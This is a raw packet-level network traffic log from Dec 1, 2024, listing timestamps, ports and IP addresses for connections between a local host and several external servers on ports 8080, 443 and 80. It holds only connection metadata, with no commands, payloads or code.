Dec 1, 2024 22:52:15.722012997 CET	49771	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:15.842056990 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:15.842077017 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:15.842137098 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:15.842147112 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:15.842200994 CET	49771	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:15.842257977 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:15.842313051 CET	49771	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:15.885385036 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:15.885562897 CET	49771	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:16.005547047 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:16.005717993 CET	49771	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:16.053492069 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:16.053580046 CET	49771	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:16.169445038 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:16.169528961 CET	49771	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:16.231159925 CET	443	49770	104.244.42.65	192.168.2.16
Dec 1, 2024 22:52:16.231291056 CET	49770	443	192.168.2.16	104.244.42.65
Dec 1, 2024 22:52:16.231913090 CET	443	49768	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:16.232003927 CET	443	49768	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:16.232064009 CET	49768	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:16.232465982 CET	49768	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:16.233069897 CET	49770	443	192.168.2.16	104.244.42.65
Dec 1, 2024 22:52:16.233088017 CET	443	49770	104.244.42.65	192.168.2.16
Dec 1, 2024 22:52:16.233342886 CET	443	49770	104.244.42.65	192.168.2.16
Dec 1, 2024 22:52:16.233468056 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:16.233513117 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:16.233584881 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:16.233805895 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:16.233822107 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:16.234322071 CET	49770	443	192.168.2.16	104.244.42.65
Dec 1, 2024 22:52:16.245456934 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:16.279334068 CET	443	49770	104.244.42.65	192.168.2.16
Dec 1, 2024 22:52:16.417484045 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:16.417606115 CET	49771	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:16.665537119 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:16.665649891 CET	49771	8080	192.168.2.16	168.119.121.16
Dec 1, 2024 22:52:16.721072912 CET	443	49770	104.244.42.65	192.168.2.16
Dec 1, 2024 22:52:16.721103907 CET	443	49770	104.244.42.65	192.168.2.16
Dec 1, 2024 22:52:16.721158028 CET	443	49770	104.244.42.65	192.168.2.16
Dec 1, 2024 22:52:16.721174955 CET	443	49770	104.244.42.65	192.168.2.16
Dec 1, 2024 22:52:16.721195936 CET	49770	443	192.168.2.16	104.244.42.65
Dec 1, 2024 22:52:16.721234083 CET	49770	443	192.168.2.16	104.244.42.65
Dec 1, 2024 22:52:16.722752094 CET	49770	443	192.168.2.16	104.244.42.65
Dec 1, 2024 22:52:16.867528915 CET	80	49772	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:16.867549896 CET	80	49772	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:16.867645025 CET	49772	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:16.913450003 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:17.487250090 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:17.488610029 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:17.488645077 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:17.506258965 CET	8080	49771	168.119.121.16	192.168.2.16
Dec 1, 2024 22:52:17.508431911 CET	49772	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:17.508769989 CET	49774	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:17.628683090 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:17.628778934 CET	80	49772	172.217.19.164	192.168.2.16
Dec 1, 2024 22:52:17.628801107 CET	49774	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:17.628844976 CET	49772	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:52:17.628987074 CET	49774	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:17.749044895 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:17.979337931 CET	49774	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:18.099483967 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:18.099507093 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:18.099561930 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:18.099570036 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:18.099608898 CET	49774	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:18.099647045 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:18.099647999 CET	49774	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:18.099654913 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:18.099693060 CET	49774	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:18.099698067 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:18.099704981 CET	49774	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:18.099716902 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:18.099747896 CET	49774	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:18.099759102 CET	49774	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:18.099802017 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:18.099809885 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:18.099864960 CET	49774	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:18.219866991 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:18.219892025 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:18.219947100 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:18.219957113 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:18.219975948 CET	49774	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:18.220007896 CET	49774	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:18.220017910 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:18.220024109 CET	49774	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:18.220063925 CET	49774	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:18.261485100 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:18.261636019 CET	49774	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:18.381427050 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:18.381541014 CET	49774	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:18.425446987 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:18.425544977 CET	49774	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:18.545461893 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:18.545548916 CET	49774	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:18.609436989 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:18.789508104 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:18.789630890 CET	49774	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:19.037502050 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:19.037616968 CET	49774	8080	192.168.2.16	51.77.125.62
Dec 1, 2024 22:52:19.285428047 CET	8080	49774	51.77.125.62	192.168.2.16
Dec 1, 2024 22:52:21.851303101 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:21.851401091 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:21.851485968 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:21.851505995 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:21.859163046 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:21.859245062 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:21.859271049 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:21.863181114 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:21.863272905 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:21.863289118 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:21.871603012 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:21.871681929 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:21.871692896 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:21.886975050 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:21.887069941 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:21.887079000 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:21.928208113 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:21.928220987 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:21.971293926 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:21.971380949 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:21.971399069 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.024243116 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.053600073 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.057732105 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.057809114 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.057833910 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.066240072 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.066323042 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.066333055 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.079241991 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.079308033 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.079334021 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.087826967 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.087929964 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.087939024 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.096201897 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.096287012 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.096296072 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.104556084 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.104619980 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.104640961 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.113184929 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.113339901 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.113349915 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.124080896 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.124171972 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.124183893 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.129762888 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.129833937 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.129848003 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.135266066 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.135324001 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.135335922 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.140883923 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.140963078 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.140973091 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.146606922 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.146672964 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.146684885 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.200185061 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.200200081 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.248219013 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.254484892 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.263128996 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.263139009 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.263246059 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.263273954 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.272177935 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.272269011 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.272280931 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.272344112 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.276505947 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.276515007 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.276588917 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.284735918 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.284744024 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.284836054 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.292802095 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.292810917 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.292953968 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.300951958 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.300961018 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.301047087 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.305186987 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.305195093 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.305289984 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.310832024 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.310839891 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.310895920 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.316646099 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.316653013 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.316729069 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.319685936 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.319782972 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.325455904 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.325557947 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.331146002 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.331235886 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.336951017 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.337023020 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.339962959 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.340043068 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.456861019 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.456976891 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.460254908 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.460326910 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.464922905 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.464993000 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.469470978 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.469568014 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.471837997 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.471900940 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.476418972 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.476505995 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.480840921 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.480920076 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.485383034 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.485444069 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.487797976 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.487878084 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.492336035 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.492409945 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.496790886 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.496867895 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.501349926 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.501432896 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.503721952 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.503798962 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.508277893 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.508358955 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.512773037 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.512823105 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.577121019 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.577189922 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.580244064 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.580323935 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.584016085 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.584100962 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.588932037 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.589029074 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.591327906 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.591409922 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.595837116 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.595892906 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.600274086 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.600358963 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.604829073 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.604912043 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.607198954 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.607270956 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.611763000 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.611833096 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.616211891 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.616275072 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.666275024 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.666286945 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.666327000 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.666380882 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.666394949 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.666434050 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.666475058 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.681936979 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.681958914 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.682032108 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.682054043 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.682106018 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.695599079 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.695617914 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.695698023 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.695710897 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.695766926 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.708544970 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.708564043 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.708632946 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.708645105 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.708697081 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.719275951 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.719293118 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.719362974 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.719373941 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.719429016 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.728979111 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.728996992 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.729053020 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.729074001 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.729165077 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.739490032 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.739506960 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.739614010 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.739626884 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.739675999 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.748483896 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.748498917 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.748564959 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.748574018 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.748650074 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.863214970 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.863238096 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.863342047 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.863357067 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.863408089 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.869544983 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.869563103 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.869662046 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.869674921 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.869723082 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.875073910 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.875097990 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.875133991 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.875148058 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.875334024 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.880310059 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.880326033 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.880408049 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.880418062 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.880475044 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.886092901 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.886107922 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.886187077 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.886197090 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.886276960 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.891791105 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.891807079 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.891868114 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.891875029 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.891931057 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.897599936 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.897614002 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.897715092 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:22.897723913 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:22.897772074 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:23.059269905 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:23.059292078 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:23.059402943 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:23.059423923 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:23.059494972 CET	49773	443	192.168.2.16	192.0.78.152
Dec 1, 2024 22:52:23.064464092 CET	443	49773	192.0.78.152	192.168.2.16
Dec 1, 2024 22:52:23.064480066 CET	443	49773	192.0.78.152	192.168.2.16
